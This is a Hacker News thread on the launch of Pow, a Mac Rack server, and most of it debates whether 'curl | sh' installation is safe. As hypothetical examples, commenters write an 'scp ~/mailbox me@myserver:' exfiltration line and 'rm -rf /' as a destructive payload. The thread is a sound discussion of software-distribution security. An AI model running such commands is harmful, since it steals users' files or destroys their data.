Introducing Pow, a zero-configuration Rack server for Mac OS X (pow.cx)
253 points by wlll 2113 days ago | 133 comments

Pow is a Node.js app written in CoffeeScript. It includes an HTTP and a DNS server and runs Rack apps by way of Josh Peek's Nack library: https://github.com/josh/nack

The screencast shows how it works and why we made it: http://get.pow.cx/media/screencast.mov

If you're interested, you can read the annotated source code, written in literate style and generated with the wonderful Docco: http://pow.cx/docs/

Run, don't walk, to read through the source... Sam's documentation is really enlightening, for folks who want to try their hand at building little servers in Node.


Very cool. Can't wait to dig into the source (learning node currently)!

This is a great web page, but I think it's borderline irresponsible to keep using this gimmick:

  curl get.pow.cx | sh
for installation. Yes, it's easy and slick. Yes, you'd have to read the code itself to make sure Pow didn't own your machine even after a secure install. Yes, you can just read the shell script. But 0.0001% of people playing with Pow will do that. Why make things easier for attackers at all?

This is an idea that I think started with Ximian back in 2000 and I think we're ready for it to die. It'd be neat if the authors of Pow were cool enough to strike it from their (otherwise amazing) front page.

(I'd also be happier if the thread where the guy explains how Pow works and what its components are were voted higher than this comment.)

Why is this bad? I get why it seems offensive, but how is running a random shell script from some host any different than running some random software downloaded and installed from the same host? Anything malicious that the shell script could do could also be done by the software itself once installed, no? If they're from the same official source, why should one be considered more trustworthy than the other?

EDIT: Okay, I see it's because of the use of sudo. But graphical installers often require the root/administrator password, and could be equally destructive.

If you download an installer from an https:// link, even though you still aren't capital-S Secure, you're still more secure than running shell scripts spat out over TCP port 80.

So would,

    curl https://get.pow.cx/ | sh
fix your complaint? Like the grandparent said, I'm not sure why curl | sh is any less secure than gem install or what have you, in the oh-god-this-script-just-ran-rm-rf-/ sense.

It would improve the situation but I'm still not a fan of perpetuating the pipe-into-shell idiom.

The only meaningful difference between the two techniques is the extra step required to explicitly execute an installer. Is that your objection, that you don't like something being automatically executed upon download?

HTTPS, automatic installation, and UX that confounds security for end-users are my three objections to this gimmick.

I really don't see what's to object about. People who care about security can review it. People who just want it to work and don't care about security will blindly execute whatever instructions are written on the site. If the app is malicious then the latter group is screwed no matter what, doesn't matter whether it's 'curl | sh' or whether it's a .dmg/.zip/.tar.gz.

Your HTTPS suggestion makes sense, but can you explain your other two points by contrasting with "gem install"? How is the installation any more automatic? How does the UX confound security?

I was assuming HTTPS based on this thread chain, but even in practice, most installers I see aren't downloaded over HTTPS.

How does this practice confound security more than a normal installer? sudo asks for my password just as a normal installer would.

It's easier for a man in the middle to change a 15-line text script than to change a binary. Lowering that effort = increasing the odds and incidence of attempted attacks.

I request one thing, you send me something completely different. I don't see how making the "something" an ASCII script makes it easier than a random binary (and there's no requirement that the random binary has any relationship with what I requested).

Oddly, I'm more used to seeing arguments that distributing source code is better than distributing binaries because you can inspect source code.

The scenario isn't that I send you something different, but that somebody else gets in between us and tampers with the data. That's what https tries to avoid.

We're arguing levels of badness here so it's a little hokey. But if you decide to open up your machine to run arbitrary code, a machine that can run shell will arguably get more infections than one that runs executables. To infect the latter, any script kiddie will need to know a 'harder' language and at least how to compile it. It's a couple more hoops to jump through. In the other case I could drive by and do scp ~/mailbox me@myserver:

"Tampers with the data" is functionally equivalent to sending me something different. There's no requirement that it look like what I requested at all, and as long as it will execute when double-clicked, it'll do the trick.

We're already talking about running arbitrary code on a machine, compiled versus interpreted is irrelevant. And I think you have forgotten that a script with the appropriate hash-bang and file permissions is indistinguishable to most users from a compiled executable.

Rubygems at least has a post-install hook that gem authors can execute automatically.

Just let me know when I can do: port selfupdate; port info ...

I thought everyone moved over to homebrew now :)

Sure, but a huge amount of software is distributed over plain old HTTP anyway. I agree that we should be using HTTPS for things like this, but I don't buy that curling a shell script is worse than downloading an installer over an unencrypted connection.

If you want https you can install from github:

curl https://github.com/37signals/pow/raw/master/install.sh | sh

No you're not! It's the same security issue.

You can, for example, point get.pow.cx at a malicious script at your network level and you're done. That's the security issue; it has nothing to do with the HTTP protocol.

With that being said, I don't care, the risk is the same as downloading any software via http, in fact I loved it, so easy :-).

In fact it's much more transparent. With a compiled binary you don't see the steps involved, with a bash script you can step line by line and see exactly what the script is doing.

Those that don't care won't look at the script any more than they'll check the md5 hash of a binary to see that it's a legit binary. For those that care, they can look at the bash source.

Sorry, I just don't agree with this, but I also recognize it as a topic that we can nerd out over for hours and hours without improving the universe even a little. If what 'tptacek thinks about the security of software distribution means anything to you --- I'm not saying it has to --- then know that I think this is a bad idea that is only not causing problems because it is a gimmick used by so few projects.

I'm really, really trying to understand your viewpoint on this. How is this any more insecure than downloading (over HTTP) and running a graphical installer that requires your root password? Is it just because it takes a bit more effort to exploit a binary, given a MitM position, or am I missing something else?

We get that you think it is a bad idea, but we don't know or understand why and how.

Since you are the security expert at HN, we are trying to understand and learn from you.

This is not plain nerdgasm: making people understand software security makes the world a little better.

You mean DNS spoofing. That only works if you can get a valid certificate at one of the recognized CAs. If you use a self-signed one curl will still complain unless -k is given. But then again, after the Comodo fiasco...

Hey Tom-

The installation process is short and fully documented: http://get.pow.cx/

The web site and manual encourage you to read it.

I think it's far more transparent than, say, an OS X Installer package.

Anyone who can run a tool to spoof DNS entries can run shell commands on machines that run this installer. Because so few people are going to install Pow relative to the population, I don't want to say this is a gigantic security problem. But the more people use this gimmick, the worse the issue gets.

I think you would be doing the universe a small but meaningful favor not to advertise this installation mechanism.

But it is a very cool tool and a really well-done site. Congrats!

Just as anyone who can spoof DNS entries could swap some other theoretical Pow installer with a malicious one.

I'm not seeing how Pow's installation process is any less secure than, say, downloading a disk image from a random site.

Not if it's served over SSL.

That has nothing to do with whether the installer is a shell script or a binary.

This comment is a repeat, but that may not necessarily be true:


Anybody can also spoof DNS entries to point rubygems.org/debian.org/centos.org/redhat.com to a malicious place where the packages contain postinstall scripts that run 'rm -rf /'.

Maybe for rubygems, not so easy for apt/rpm as they use gpg signing/verification of package indices.

RubyGems also has signing facilities. Most authors don't bother signing, however, because generating a key is too much trouble.

It might also be nice to have a Homebrew recipe, if it's possible to run it from /usr/local instead of ~/Library/Application Support (haven't dug through the code yet).

As another HN reader who does security for a living, perhaps I can add some specific points. (I know this thread is probably dead given that it is 1 day old, but I access this site via HN Daily now so bear with me.)

* No transport security. As many people mention, at least adding HTTPS would help with this. However, most non-browser SSL clients (wget, curl) don't include any root certs by default so even switching to SSL would not help this method. Firesheep, sslstrip, etc. automatically generate a self-signed cert which would look no different to wget than a real cert.

* No persistence. If you download any installer package once and then reuse it on multiple machines, you get the benefit of knowing that the same code was installed on each machine (good or bad). With this method, users may catch the site in the middle of an update and get multiple versions of the package.

* No authentication. Even with SSL, you only get strong transport security. You would know strongly that ".pow.cx" sent you some code, but not how that code got put on the server. With package-signing, typically done on the developer's end system, you know that it was protected even before it was uploaded to some site.

* Easier to trojan than binaries. Inserting a few extra shell commands in a single HTTP(S) session (say, targeting a single client IP) is much easier than building a custom binary package. Consider how hard it is to even compile Firefox with all the dependencies. Now do that work and insert a trojan and upload a separate 10 MB binary that needs to be stored somewhere on the server while waiting for that one client to visit the site. Compare this to keeping a two-line patch to a shell script (easily done in RAM, maybe even by hotpatch).

* Trains users that all the above is ok since the popularity of this "| sh" install method is relatively new. (Yes, I know about shar scripts in the past but those ended by 1996 or so with the advent of real package managers). It is absolutely impossible to retrofit "| sh" to be secure, whereas it is definitely feasible to add package signature verification support to gem or yum or apt or whatever (in fact, all those already support it).

The fact that many installers aren't signed today is not an ok to drive this process back to the 80's. We should be moving toward the future when package signing is a required part of being a software developer. Too hard? Well build tools to make this easier!

Well, just to play devil's advocate, do you read through the source code of MySQL, Apache, or RPM packages every time you install them?

With things like this that come from reputable sources, it's not unreasonable to put some trust in the source and some trust in the smaller percentage of developers who actually read the source code.

As others have pointed out above, the point is not where you think it is coming from, it is where it is actually coming from. Someone could easily man-in-the-middle the connection and change the code you download, so your computer would run whatever they wanted it to run.

You say someone could "easily" man-in-the-middle the connection, but is it really that easy? Or likely? (Assuming you're not installing it from a random public wifi hotspot.)

Even so, assuming you want to be extra careful (you're installing it on a development machine with highly sensitive information), it's not that difficult to clone the repo and edit the install script to install from your local copy of the repo.

I don't think a brand-new webserver hack counts as a reputable source just yet.

I think 37signals counts as a reasonably reputable source if you're a Rails developer.

Oh, didn't notice that.

Agreed. The command made me nervous until I saw the 37signals logo. After that, I didn't think twice.

I mean yes, it does take a whole minute to verify that the pow code repo is on 37signals' GitHub organization account and that the repo references http://pow.cx.

Although I suppose it is possible that 37signals' GitHub account was hacked and someone maliciously designed a convenient Rack server and website with the intent of targeting the lucrative Rails developer demographic, or that the package the installer downloads is an insidious 37signals trojan not built from the code at the public repo.

Point taken.

This scripts vs binaries situation reminds me of something in the linux kernel: you can't use the sticky bit against scripts. When you add it, it shows as sticky in 'ls -lF' but doesn't work when you go to run it. Sticky bit is only for binaries.

It seems stupid, but on the other hand I never see people abusing the sticky bit, possibly as a result of the higher barrier to entry.

On the other hand, it causes me inconvenience every time I want to do something legitimate with it.

Scripts with interpreters expose a race condition vulnerability whereby an attacker can quickly replace the script with their own before the interpreter, running with higher level privileges, finishes loading.

It is not really a script vs. binary issue so much as protecting against how scripts are loaded.

I suppose you could define a curl wrapper that lets you review the file before passing it along to sh...

    curl_review() {
        result=`curl -s "$@"`
        echo "$result" > `tty`
        echo "Enter to proceed, Ctrl-C to abort:" > `tty`
        read < `tty`
        echo "$result"
    }
Then just change curl to curl_review:

    curl_review get.pow.cx | sh
Of course this kind of defeats the purpose of these easy installation tricks.

I agree, if I put rm -rf / in that script you would be rightfully disappointed. Why would anyone trust someone to do this? When I download a script, I always read the code first.

Let's cut to the chase. OP is right. curl is a shitty way to install software. All these other arguments are peripheral to the central issue, which is simply that curl is a shitty way to install software. Reasons have already been given, arguments have already been made, and no difference has been made.

curl is a shitty way to install software.

Pow uses an interesting trick to get *.dev URLs resolving to localhost: it adds /etc/resolver/dev, which acts as a resolv.conf for the .dev domain and points to a nameserver at port 20560. The Pow server binds to that port and acts like a nameserver for .dev domains.
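Based on that description, the resolver file is presumably something like the following (the exact contents are an assumption here; see resolver(5) on OS X for the format):

```
# /etc/resolver/dev -- hypothetical contents
nameserver 127.0.0.1
port 20560
```

With a file like that in place, the system resolver sends queries for *.dev names to the DNS server Pow runs on port 20560.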

This is a cool idea and I wish it were available for Linux.

I love this. You simply create a symlink to your app, and boom, the app works at nameofthesymlink.dev. Even after a system restart. And pow is clever enough to only start workers if the app is accessed and shut them down when idle.

This is a blessing if you usually need multiple local apps running.

It also means you can now elegantly use local ruby webapps as personal desktop applications. Say you'd like to build a simple journal or expenses app to use on your desktop for personal use. You can now quickly build it with - say - Sinatra, Datamapper and SQLite. And no need to launch or quit it. Beautiful.

Thanks for posting this... after reading all the FUD, it really made my day.

Thanks for building and sharing it.

By the way, I didn't completely understand why I would use it instead of Thin until I had it running and had read http://pow.cx/manual.html. Maybe the mechanism I described in the first paragraph of the grandparent should be more prominently and clearly communicated? Maybe that's part of what you meant with the first two paragraphs under "Pow prevails over the forces of evil.", but in that case I think they could be more specific. But maybe that's just me.

Seriously, dude, nobody is out to get you. I'm glad you made Pow. Pow looks awesome. I don't control what gets voted to the top of the page, and I'm probably no happier than you are about the sprawling nerdwar that resulted.

Seriously, dude, get over yourself. It's pretty ridiculous how much FUD this project announcement received in here, versus positive focus. There are multiple other long FUD threads that missed the point of Pow; you only started (and kept throwing fire at) the one that doesn't even touch what the project is about.

I'm absolutely not interested in making people scared of Pow.

Especially after a system restart

Ok, we get it, some people are paranoid and afraid of running a "random script" and having to sudo to install it. Can we please have a discussion on the merits of the actual application? I just installed it - I trust 37signals enough to give them the benefit of the doubt - and I love how simple it is to access the different apps I'm working on at the same time without having to worry about configuration. Thanks, 37signals.

Hooray! No more mucking around in /etc/hosts, .rvmrc, or .profile! Now you can muck around in ~/Library/Application Support/Pow/Hosts, .powrc, and .powenv instead!

Thanks but no thanks. Do yourself a favor and learn how to install rack and nginx. It's already dirt simple, and you'll save yourself having to go back and learn it when it's time to deploy your app somewhere other than your laptop.

Or, you could NOT muck about in ~/Library/Application Support/Pow/Hosts, .powrc, and .powenv, and just symlink your app directories into ~/.pow, which is probably how 99% of developers will use it.
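That workflow amounts to a couple of shell commands. A sketch (the paths are illustrative, and mkdir -p stands in for the directories Pow's installer normally creates):

```shell
# Link an app directory into ~/.pow; Pow then serves it at http://myapp.dev
mkdir -p "$HOME/projects/myapp" "$HOME/.pow"
ln -sfn "$HOME/projects/myapp" "$HOME/.pow/myapp"
readlink "$HOME/.pow/myapp"   # confirms where the link points
```

The name of the symlink becomes the hostname, so renaming the link is enough to change the .dev URL.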

In fairness to the parent post, it may not always be that simple. I installed, symlinked as you described and am currently looking at a page filled with "Pow: Error Starting Application". (Apparently it thinks I don't have Bundler installed. This is likely an issue because of pow + rvm + gemsets + factor x.)

The downside of zero configuration is "What do you do when it doesn't just work?" (I'm digging around the manual now...)

(A quick follow-up: The second app I symlinked in the exact same way does "Just work", so I don't doubt that there's something odd about my config for the first. Still, no fun to debug.)

As near as I can tell at the moment, it doesn't seem to respect any gemsets specified in your project .rvmrc, just the ruby interpreter specified.

Odd - my two apps have identical .rvmrc files (both using the same interpreter and gemset). Even odder, the first app is now working, and I'm completely not sure why.

If you haven't already, open Console.app, show the log list and there's a set of Pow logs in there. It might help out.

It turned out my issue was being caused because I was running an older version of rvm. Updating fixed it.

Incidentally, RVM is another software package with a curl-based install :)

$ bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head )

And npm is another popular one. I'm not sure if the multiple examples helps your case or tptacek's though. (That is, we all seem to be getting more and more comfortable with this style of installation.)

tptacek has a good point that you shouldn't just trust any old curl-based install, but I think that really applies to any install of any kind. I think you have to consider the source of any software package, it's not something specific to this particular method.

To say that something is "zero-configuration" is complete marketing garbage. You get what you deserve if you choose to believe it.

Just what this thread needed, more FUD.

Not important, but why the ".cx" TLD? Is this intended to be pronounced a certain way?

I would guess it's more of a "pow.* was available for this TLD" decision.

What the hell, it's written in Node.js and CoffeeScript. Color me impressed. I'm now motivated to tackle this for Python.

I don't know much about wsgi, but it seems like you could make a node.js <-> wsgi adapter pretty easily.

I'd love to see a WSGI adapter for Pow!

Check out Nack (https://github.com/josh/nack) to see how Pow runs Rack apps.

Indeed, that would be awesome if we could have the same kind of zero-conf, instant-deploy-via-symlink for wsgi/python apps.

gem install passenger

passenger start

No preference panes to install. No Apache configuration files to update. And Passenger eliminates the need to edit /etc/hosts. To get a Rack app running, just type a single command.

You conveniently omitted the step where you get an app running.

And upgrading Passenger requires you to install a gem, then run a command, copy and paste a bunch of text into your Apache config file, and restart Apache.

Not in the example he gave. He was using Phusion Passenger Standalone, i.e. not Phusion Passenger for Apache. Phusion Passenger Standalone does not require an external web server. It literally is just running 'passenger start'. No config files to edit. http://blog.phusion.nl/2010/07/01/the-road-to-passenger-3-te...

I'm a huge passenger fan, but I should note that:

* this is also a single command to get a rack app running once you have it installed

* you can easily support multiple ruby versions/gemsets (otherwise you'd need to install/compile passenger for each)

* appname.dev is easier than remembering which port all of your rails apps are running on.

* you don't have to start each app manually each time.

* Not sure what you mean.

* Passenger supports using various gemsets very easily using the setup_load_paths.rb file in the config of your app (though multiple ruby versions still seem to be a problem).

* If you're using passenger, why do you have each app running on a different port? Using the Passenger Prefs Pane makes it trivially easy to have each app at its own appname.local URL (though, admittedly, installing an extra prefs pane, where Pow has it built in, gives bonus points to the latter).

* Same with my last point. Passenger automatically handles the booting up of apps when you access their URL in the browser, just like Pow does. Of course, I'm guessing you don't have Passenger installed this way if each app has to run on a different port.

I should note that I'm mostly referring to the parent, which was referencing passenger standalone, which runs like a classic thin or mongrel.

There are some drawbacks to using Passenger/Mongrel/Webrick for development though, especially when you need to test subdomains and/or SSL.

How so? I've been using Passenger on my dev machine for over a year now. The original reason I installed Passenger on my dev machine was exactly because of how easy it was to get SSL and subdomains working; the app I was working on at the time had 100% SSL user logins, each routed to their own subdomains.

You're using it with Apache or Nginx though, right? Or were you able to get them working with Passenger Standalone?

Ah yes, you are correct, with Apache.

I did this and soon my computer was downloading and compiling nginx.

When this finished, I got an error and it all failed: "* ERROR: Please install file-tail first: sudo gem install file-tail"…

So I did, and now it's supposedly running on port 3000, except I just get a 403 error when I visit it in my browser. The docs aren't very helpful either (http://www.modrails.com/documentation/Users%20guide%20Standa...).

Update: I apparently missed the line about going to my application's root directory. I still didn't really like all the stuff that got downloaded and compiled on my machine, when all I would like to do is get started developing.

I'm a Phusion Passenger developer. The goal for Phusion Passenger Standalone really is to have the command 'passenger start' Just Work(tm). After installing all required libraries, if it says it's running on port 3000 and it doesn't, then it's either a bug which we are dedicated to fix, or there might be something wrong with your system.

The 'file-tail' thing is actually a bug (we should no longer have a requirement on file-tail). We've already fixed it in git master 3 days ago and the fix will be released very soon.

Can you give me some more details about the 403 error? Do you see anything in the console or in the browser window that tells you more about the error?

Sorry :( I made a reading error and I updated my post.

It still seems like a lot of software and time to just start developing. What does passenger get me for developing locally that Pow doesn't? (I've never used Passenger before today).

I can't comment on how Phusion Passenger Standalone differs from Pow because I've never used Pow. However I can tell you what Phusion Passenger Standalone's benefits are:

1. Phusion Passenger is currently the most popular production server for Ruby web apps (see ruby-toolbox.com and the last NewRelic survey). Phusion Passenger Standalone is practically the same as Phusion Passenger for Nginx. It's a good thing to have the development environment match the production environment as much as possible. Phusion Passenger actually comes in 3 editions: Phusion Passenger for Apache (integrates into Apache), Phusion Passenger for Nginx (integrates into Nginx) and Phusion Passenger Standalone (can run by itself, does not require an external web server).

2. Because Standalone is based on an Nginx core it's even fit for production. According to the Pow website it uses Nack, which according to its website is not ready for production. If 'passenger start' works for you locally then you can run the same thing in production. No need to learn how Apache and Nginx works.

There are other things as well, but I have to go in a few minutes. Feel free to ask me more questions if you like.

As for "the stuff that got downloaded and compiled on my machine", that's Nginx being downloaded and compiled there. Nginx is a high-performance, lightweight, extremely stable, battle-tested and proven web server.

Hypothetically speaking, it's possible to modify Phusion Passenger to not download and install Nginx. We can run on a pure-Ruby web server like WEBrick. However I guarantee you, WEBrick sucks; it's slow, buggy and leaks memory.

A gem distribution of this would have been nice... simply so that instead of:

  $ curl get.pow.cx | sh
  $ cd ~/.pow
  $ ln -s /path/to/myapp
We could have:

  $ gem install pow
  $ pow /path/to/myapp

Pow isn't written in Ruby but JavaScript, so it might be installable from npm soon.

If you `git clone git://github.com/37signals/pow.git`, you can install it from source with `npm install -g` (requires npm 1.0)


Pretty awesome. It took a restart to get it to work, but it's great now.

As a minor aside, is there a way to get Chrome to treat .dev domain the same as .com? Whenever I type in my .dev app name, it tries to google search for it.

+1, I'd like to know that.

In the meantime, you can access a new app the first time by entering http://myapp.dev (including the http://). Looks like after that, Chrome treats myapp.dev as desired.

Nice, you can change the env variable POW_DOMAIN to ".local". Much better in my opinion (works better with chrome at least)

EDIT: scratch that. You can't do this.

How much of this is OS X-specific, given that it's a Node.js app? Other than the launchctl and plist stuff, could this be ported to Linux?

The majority of the OS X-specific aspects have to do with how it launches (launchd .plist files) and how it automagically resolves .dev domains (using /etc/resolver - see: http://developer.apple.com/library/mac/#documentation/Darwin... )

Substituting launchd is easily done with any process launcher of your choice. The .dev TLD trick is a little harder: OS X 10.6 supports flat files inside /etc/resolver/*, where the name of each file indicates the domain whose resolver configuration it holds. As such, they just drop a file named 'dev' in there and tell it to look to localhost on a custom port for DNS resolution. Then they run a mini DNS server on that port to resolve .dev domains to localhost.

Probably the only way to do something similar to this for linux would be to run a name server of your own on your box and add a custom zone configuration for the .dev TLD and recursive lookup for anything else.
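For what it's worth, a lighter-weight sketch on Linux uses dnsmasq rather than a full zone configuration. This fragment is an assumption about how you'd wire it up yourself, not something Pow ships:

```
# /etc/dnsmasq.d/dev-tld.conf -- hypothetical dnsmasq fragment
# resolve every *.dev name to the local machine
address=/dev/127.0.0.1
```

After restarting dnsmasq and pointing /etc/resolv.conf at 127.0.0.1, lookups for any *.dev name should return 127.0.0.1; you'd still need something Pow-like listening on the HTTP side.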

Yeah, this is interesting. With a little fiddling I was able to get the web server up. It's not picking up my app yet, though I'm not sure whether that's because it's not being initialized or because I can't reach it without the DNS set up.


This is very nice documentation. Is it generated using a freely available tool?

Generated with Docco: http://jashkenas.github.com/docco/

As an aside, does anyone know what was used to generate the "Annotated Source" code listings? They look absolutely beautiful. Were they generated from the underlying source, or put together by hand?

I don't see any connection between being a "super-hero" and a mindset where you don't know how your code works inside.

Installation wasn't easy or slick here:

  *** Installing local configuration files...

  /Users/bonaldi/Library/Application Support/Pow/Versions/0.2.2/lib/command.js:50
            throw err;
  Error: EACCES, Permission denied   '/Users/bonaldi/Library/LaunchAgents/cx.pow.powd.plist'

If anyone else sees this, the script assumes it can write to ~/Library/LaunchAgents as you. Make sure you can!
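A quick pre-flight check along those lines (a sketch; it creates the directory if it's missing, which is also what you'd want):

```shell
# Verify that ~/Library/LaunchAgents exists and is writable by you.
dir="$HOME/Library/LaunchAgents"
mkdir -p "$dir"
if [ -w "$dir" ]; then
    echo "writable"
else
    echo "not writable; try: sudo chown $USER \"$dir\""
fi
```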

Maybe it's just me but I can not seem to get any application to work. Chrome just says "Server Not Found". I tried to check the logs in ~/Library/Logs/Pow but the directory doesn't even exist. Didn't know if it was something silly before I created a ticket on Github.

yep, same thing here. I get this if I launch it manually on 10.6.7:

  launchctl load "$HOME/Library/LaunchAgents/cx.pow.powd.plist" 
Bug: launchctl.c:2325 (23930):13: (dbfd = open(g_job_overrides_db_path, O_RDONLY | O_EXLOCK | O_CREAT, S_IRUSR | S_IWUSR)) != -1 launch_msg(): Socket is not connected

When I ran this, I got the following error: "launchctl: Dubious permissions on file (skipping)"

The file was chmodded to 664; changing it to 644 did the trick.

It seems to have something to do with iTerm or tmux. It works using Terminal.

Edit: I only get the error using tmux. Strange...

Yeah, that seemed to have fixed it. Terminal works, iTerm doesn't.

Same problem, but using Terminal.

Fixed with restarting my machine. And it's worth it.

A shell function to add directories to ~/.pow:

    function pow {
        if [ -d "`cd $1; pwd`" ]; then
            ln -s "`cd $1; pwd`" ~/.pow/
        fi
    }

I do not much like this 'curl $random_url | sh' installation method. I am not going to be running some random script without looking long and hard at it first.

Why not just download it and then read it yourself? Do you enter your root password when installing some GUI applications?

At least in this instance you can read over the commands that will be run beforehand—in fact, Sam actively encourages you to do so.

I don't understand how this is any different from running the application after you install it by whatever other method. Your shell doesn't have some higher level of access than most other software.

> I don't understand how this is any different from running the application after you install it

I'll tell you one difference. It takes me 10 minutes to review the shell based installer. It takes a whole lot longer to inspect an installation package or application source code.

Completely understandable. That's why the installer source is fully documented and linked up for your review. http://get.pow.cx/

This just goes to show that there will be naysayers for literally every good idea.

It's a one-page script and a reasonably small, public git repo, from a company that doesn't exactly have a reputation for hacky, unreliable software.

Do you read through the source of every piece of software you download and install? If not then why worry about one shell script?

Then 'curl get.pow.cx > pow.sh'. Take your time and look at the script, then run it. Worked for me.
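The same save-then-inspect pattern, sketched with a local stand-in so it doesn't depend on the network (the heredoc plays the role of `curl get.pow.cx > pow.sh`):

```shell
# Stand-in for the downloaded installer script:
cat > pow.sh <<'EOF'
echo "installing pow (stand-in)"
EOF
# Read it first (e.g. with `less pow.sh`), then run it deliberately:
sh pow.sh
```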

Let's take an informal poll: how many people grousing about the installation method were actually planning to install and use this?

I have no f*kin' idea how you did this, guys. But the result is amazing even for us casual weekend spaghetti coders ;-)

It would be nice if there were an easy way to start/stop pow when needed.

That x86_64 node executable doesn't play nice with Core Duo Macs.

Great stuff!
